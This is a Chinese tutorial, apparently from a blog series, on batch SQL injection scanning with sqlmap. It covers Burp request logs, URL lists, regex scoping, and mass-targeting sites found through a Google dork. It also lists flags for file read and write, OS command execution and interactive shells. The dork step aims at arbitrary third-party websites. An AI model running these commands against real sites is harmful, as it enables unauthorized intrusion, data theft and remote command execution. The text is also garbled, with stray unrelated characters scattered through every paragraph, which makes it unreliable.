一.批量化掃描burp的請求日記
01.首先配置burp記錄所有的request請求号杠,并保存在指定文件夾,如我保存在sqlmap目錄下名為sql.txt屉凯。
02.接著瀏覽器設(shè)置burp代理芬探,訪問測試url,查看sql.txt哩簿。
3.使用sqlmap掃描
sqlmap.py -l sql.txt --batch -smart
Batch:會自動選擇yes
Smart:啟發(fā)式快速判斷节榜,節(jié)約時間
偷懶的做法别智,最好不要--batch -samrt了,會錯過很多選項導(dǎo)致注入失敗讳窟。掃描結(jié)果可以到C:\Users\Administrator\.sqlmap\output去查看敞恋。
二.批量掃描文本中的多個目標
文本中保存url格式如下,sqlmap會一個個檢測补箍。
sqlmap.py -m url.txt
三.利用正則過濾目標網(wǎng)址
為什么過濾目標網(wǎng)址坑雅,前面批量掃是讓我們掃描burp的請求耶,那這么多請求终蒂,有的請求并非是我們要掃描的網(wǎng)址怎么辦遥诉?用正則干掉他吧!!愕难!
參數(shù):--scope
例如:只想要www開頭惫霸,.com/.net/.org結(jié)尾的網(wǎng)址
python sqlmap.py -l burp.log --scope="(www)?\.target\.(com|net|org)"
更多的看各位正則的功底啦。
四.利用谷歌批量掃
如首先用谷歌搜索.php?id=1結(jié)尾的URL猜丹,然后進行注入測試硅卢。
sqlmap.py -g "inurl:\".php?id=1\""
五.關(guān)于文件寫入與shell獲取
--sql-shell #執(zhí)行指定sql命令
--sql-query #執(zhí)行指定的sql語句
--file-read#讀取指定文件
--file-write #寫入本地文件
(--file-write /test/test.txt --file-dest /var/www/html/1.txt;將本地的test.txt文件寫入到目標的1.txt)
--file-dest #要寫入的文件絕對路徑
--os-cmd=id#執(zhí)行系統(tǒng)命令
--os-shell #系統(tǒng)交互shell
--reg-read#讀取win系統(tǒng)注冊表
六.總結(jié)
此次主要介紹批量化掃描的幾個方式将塑,關(guān)于文件寫入和shell獲取,由于我實驗環(huán)境權(quán)限存在問題艾疟,所以只是簡單的列出命令敢辩,希望小伙伴有執(zhí)行成功的能夠告訴斗哥一聲啊。好了戚长,sqlmap系列基本也就要告一個段落了历葛,而sqlmap本身還有很多的東西值得我們學(xué)習(xí)嘀略,雖然分成了4個系列乓诽,但是只是說如何使用這個工具罷了,還有很多奇淫巧技斗哥也還沒有g(shù)et到讼育,有機會大家一起討論吧稠集。
